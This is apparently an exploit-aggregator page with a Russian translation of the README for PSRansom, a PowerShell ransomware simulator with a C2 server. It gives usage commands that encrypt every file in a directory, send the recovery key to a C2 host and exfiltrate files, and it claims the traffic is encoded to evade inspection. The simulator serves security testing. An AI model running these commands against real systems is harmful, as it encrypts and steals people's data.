Skip to content
PSRansom exploit

PSRansom exploit

Sploitus September 18, 2026

![PSRansom](

**PSRansom** — это симулятор программы-вымогателя на PowerShell с возможностями C2-сервера. Этот инструмент помогает симулировать процесс шифрования типичного вымогателя в любой системе с установленным PowerShell. Благодаря встроенному C2-серверу вы можете эксфильтровать файлы и получать информацию о клиентах через HTTP.

Всё общение между двумя элементами зашифровано или закодировано, чтобы оставаться незамеченным для механизмов проверки трафика, хотя HTTPS ни разу не используется.

Рекомендуется клонировать полный репозиторий или скачать zip-архив. Это можно сделать, выполнив следующую команду:

git clone

| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___

| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \

| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |

|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|

----------------- by @JoelGMSec ----------------

Информация: Этот инструмент помогает симулировать процесс шифрования

типичного вымогателя в PowerShell с возможностями C2

Использование: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port

Шифрует все файлы и отправляет ключ восстановления на C2Server

Используйте -x для эксфильтрации и дешифрования файлов на C2Server

.\PSRansom.ps1 -d Directory -k RecoveryKey

Расшифровывает все файлы с помощью строки ключа восстановления

Предупреждение: Вся информация будет отправлена на C2Server без какого-либо шифрования

Вам необходим заранее сгенерированный ключ восстановления для получения файлов

### Подробное руководство по использованию можно найти по следующей ссылке:

Этот проект лицензирован под лицензией GNU 3.0 — подробнее см. в файле LICENSE.

Этот инструмент создан и разработан с нуля Joel Gámez Molina // @JoelGMSec

Данное программное обеспечение не предоставляет никаких гарантий. Его использование разрешено исключительно в образовательных целях и/или для аудитов безопасности с соответствующим согласием клиента. Я не несу ответственности за его неправомерное использование или любой возможный ущерб, причинённый им.

Для получения дополнительной информации вы можете найти меня в Twitter как @JoelGMSec и в моём блоге darkbyte.net.

Вы можете поддержать мою работу, купив мне кофе:

![buymeacoffe](